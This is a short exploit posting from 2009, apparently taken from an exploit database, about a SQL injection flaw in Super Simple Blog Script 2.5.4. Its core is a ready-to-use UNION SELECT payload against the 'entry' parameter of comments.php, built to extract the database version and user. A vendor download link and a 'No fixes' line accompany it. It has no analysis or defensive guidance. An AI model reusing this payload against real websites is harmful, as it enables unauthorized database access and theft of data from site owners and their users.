Super Simple Blog Script 2.5.4 (entry) SQL Injection Vulnerability

2009-07-17 16:34:45

----------[exploit Debut]
[Remote SQL Injection Vulnerability]
----------[Script Info]

Moi : JIKO
Site : No-exploit.Com
Email : mm :( Moghla9 Ferme Closed

----------[Script Info]

Site:http : http://www.supersimple.org/
Download : http://supersimple.org/downloads/SuperSimpleBlogScriptV2_5_4.zip

----------[exploit Info]

1]~[Sql]
http://localhost/Path/comments.php?entry=-122222 union select 0,concat(0x223E,version(),0x3A,user())--
----------[exploit Fin]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.